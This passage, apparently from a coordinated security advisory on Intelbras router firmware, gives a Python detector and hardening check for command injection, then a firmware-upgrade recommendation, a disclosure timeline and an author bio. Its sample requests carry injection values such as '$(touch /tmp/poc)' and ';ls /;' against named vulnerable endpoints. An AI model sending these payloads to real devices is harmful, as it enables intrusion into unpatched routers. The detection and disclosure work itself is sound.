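The command injections in the JetWave, DX-2100-L1-CN and WiFiber 120AC advisories above all follow one pattern: a form value is pasted into a shell command line, so ';', backticks or '$(...)' append commands (the DVW-W02W2-E2 and BAT-C2 cases work the same way). As an added example, not code from any vendor or from these advisories, the following Python shows both sides of that pattern: a detector that decodes requests to the affected endpoints and flags metacharacters in their parameters, and the allow-list check plus shell-free argument vector a hardened ping or TFTP handler would use instead; the endpoint list, function names and sample requests are constructed from the PoCs above.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Metacharacters that turn a form value into extra shell commands when a CGI
# handler pastes it into a command line: ';', pipes, '&', backticks, '$(...)'
# and line breaks. Every injection on this page uses one of these.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(")

# Endpoints taken from the PoC requests in the advisories above.
WATCHED_ENDPOINTS = {
    "/goform/formTFTPLoadSave", "/goform/formSysCmd",  # JetWave
    "/lform/net_diagnose",                             # DX-2100-L1-CN
    "/boaform/formPing6", "/boaform/formTracert",      # WiFiber 120AC
}

def decode_params(qs: str):
    """Decode an x-www-form-urlencoded string by hand: older parse_qsl versions
    also split on ';', which would hide the ';'-based payloads seen above."""
    pairs = []
    for field in qs.split("&"):
        if field:
            key, _, value = field.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def parse_request(raw: str):
    """Return (method, path, params) for a raw HTTP request; params merges the
    query string and the body so GET- and POST-based payloads look alike."""
    head, _, body = raw.partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    url = urlsplit(target)
    return method, url.path, decode_params(url.query) + decode_params(body.strip())

def find_injections(raw: str):
    """Detection: (path, parameter, decoded value) for each parameter of a
    watched endpoint whose decoded value contains a shell metacharacter."""
    _, path, params = parse_request(raw)
    if path not in WATCHED_ENDPOINTS:
        return []
    return [(path, k, v) for k, v in params if SHELL_META.search(v)]

HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def is_valid_host(value: str) -> bool:
    """Mitigation: allow-list a ping/TFTP target as an IP literal or a plain
    hostname. Anything else, metacharacters included, is rejected outright."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None

def ping_argv(host: str, count: int = 3):
    """Argument vector a hardened handler passes to subprocess.run(argv) with
    shell=False: the validated value is a single argv entry, never shell text."""
    if not is_valid_host(host):
        raise ValueError("rejected ping target")
    return ["ping", "-c", str(count), host]

# Constructed sample requests modelled on the PoCs above (not captured traffic).
SAMPLES = {
    "jetwave_tftp": "POST /goform/formTFTPLoadSave HTTP/1.1\nHost: 172.16.0.38\n\n"
    "submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1"
    "&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load",
    "dx2100_get": "GET /lform/net_diagnose?action=diagnose&diagnose_type=0"
    "&diagnose_address=;ls%20/; HTTP/1.1\nHost: 192.168.3.150\n\n",
    "wifiber_benign": "POST /boaform/formPing6 HTTP/1.1\nHost: 192.168.3.147\n\n"
    "pingAddr=2001%3Adb8%3A%3A1&wanif=65535&submit-url=%2Fping6.asp",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, find_injections(raw) or "clean")
```

Run against a web server access log or a proxy capture, the detector only reports the decoded parameter, so the '+' and '%24%28' encodings in the JetWave PoC are caught the same way as the raw ';' in the DX-2100 URL.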

Solution

Workaround

None

Recommendation

CyberDanube recommends Intelbras customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.
  • 2022-08-03: Request from Intelbras to send the advisory to csirt@intelbras.com.br; Sent the advisory to this address.
  • 2022-08-30: Asked for a status update; Vendor answered that the new firmware version had been released the day before. Set the disclosure date to 2022-10-03 (60-day policy).
  • 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
  • 2022-10-09: Coordinated disclosure of advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.
